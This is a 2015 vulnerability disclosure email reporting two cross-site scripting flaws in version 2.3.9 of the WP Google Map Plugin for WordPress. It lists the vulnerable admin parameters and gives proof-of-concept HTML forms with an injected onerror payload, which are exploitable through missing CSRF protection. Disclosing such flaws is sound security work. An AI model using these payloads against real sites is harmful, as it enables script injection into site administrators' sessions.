Subject: Cross-Site Scripting (XSS) in WP Google Map Plugin 2.3.9
Date: Thu, 20 Aug 2015 14:42:55 +0200

Hello,

Plugin: WP Google Map Plugin 2.3.9 https://wordpress.org/plugins/wp-google-map-plugin/

1. Cross-Site Scripting (XSS) 

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: POST
Url: http://localhost/wp-admin/admin.php?page=wpgmp_add_location
Vulnerable parameters: googlemap_title, googlemap_address, googlemap_latitude, googlemap_longitude, googlemap_infomessage

Example PHP callstack:
wpgmp_add_locations   /wp-google-map-plugin/wpgmp-add-location.php:128]

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin.php?page=wpgmp_add_location" />
<input type="text" name="googlemap_title" value='"><img src=x onerror=alert(1) /> ' />
<input type="submit" />
</form>
--

2. Cross-Site Scripting (XSS) 

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: POST
Url: http://localhost/wp-admin/admin.php?page=wpgmp_google_wpgmp_create_group_map
Vulnerable parameters: group_map_title

Example PHP callstack:
wpgmp_create_map   [/wp-google-map-plugin/wpgmp-create-map.php:237]

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin.php?page=wpgmp_google_wpgmp_create_group_map" />
<input type="text" name="group_map_title" value='"><img src=x onerror=alert(1) /> ' />
<input type="submit" />
</form>
--

--
Regards,
Marcin Probola,